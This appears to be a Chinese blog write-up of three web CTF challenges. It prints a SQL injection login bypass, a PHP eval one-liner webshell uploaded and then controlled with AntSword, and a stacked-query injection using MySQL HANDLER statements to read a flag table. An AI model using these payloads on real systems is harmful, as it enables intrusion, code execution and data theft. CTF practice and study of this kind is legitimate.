简单的招聘系统

登录页面存在二次注入,在username一栏填入’or 1=1#就可以以admin身份登录(必须处于未注册状态才可行).以admin身份登陆后,进入blank(全名忘了)页面,有一栏search,在search栏利用admin的数字key进行insert报错注入.(当然也可以用sqlmap一把梭).

ezupload

官方题解发出来才发现我的做法是非预期…
打开是一个上传文件的页面,bp抓包之后直接传了一句话木马的php文件,一句话木马内容:<?php @eval($_POST['pass']); ?>,上传成功后使用蚁剑连接,根目录有一个readflag程序,使用蚁剑自带的虚拟终端运行该程序即可.
附上预期解:

本题考查apache ssi rce 漏洞。
访问题目首页是一个文件上传,可通过上传shtml来生成php一句话木马

blacklist

本题改编自2019强网杯随便注,但过滤了rename,set等,所以原题做法不可行,但前面部分payload还是可以照抄的.BUUCTF-Web-随便注(三种解题思路)一直查询到字段之后,就需要换别的方式来解出本题了.由于本题数据库为mysql,所以我们可以使用handler语句.

以下内容出自右边文章:mysql查询语句-handler

handler语句简介

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表.

基础语法

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

通过HANDLER tbl_name OPEN打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。
通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的句柄。

通过索引去查看的话可以按照一定的顺序,获取表中的数据。
通过HANDLER tbl_name READ index_name FIRST,获取句柄第一行(索引最小的一行),NEXT获取下一行,PREV获取前一行,LAST获取最后一行(索引最大的一行)。

通过索引列指定一个值,可以指定从哪一行开始。
通过HANDLER tbl_name READ index_name = value,指定从哪一行开始,通过NEXT继续浏览。

如果我们不想浏览一个表的所有行,可以使用where和limit子句。
回到题目
通过handler语句我们可以构造payload:1';handler FlagHere open;handler FlagHere read first;#如此即可获得flag.

废话part:不会的题目很多,希望下次能做出更多题.

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号